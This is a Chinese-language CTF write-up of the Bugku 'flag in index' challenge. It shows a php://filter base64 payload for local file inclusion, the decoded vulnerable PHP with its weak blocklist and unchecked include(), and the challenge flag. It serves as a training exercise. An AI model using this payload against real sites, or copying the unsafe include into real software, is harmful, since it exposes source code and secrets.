CTF之Bugku flag在index里

这是一道重新温习的题,直接来看。
在这里插入图片描述

“点我?不”

我就点!基本操作还是要看看源代码的,不过这个没什么好看的就不贴图了。
在这里插入图片描述

点完后发现URL后面有个 file=balabalabala 的,就联想到php://filter
不明白为什么会这样联想的就看看这个文章。

简单来说就是查看网页同一目录下的另一个文件。

怎么查看呢?

在file=后面加上这样一个语句php://filter/read=convert.base64-encode/resource=index.php

然后就变成这样

在这里插入图片描述

后面有两个等于号,base64解一下。

解出来是这样的:

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

flag就出来啦~~~

转载:https://blog.csdn.net/cherrie007/article/details/75269595

猜你喜欢

转载自blog.csdn.net/weixin_41607190/article/details/82966412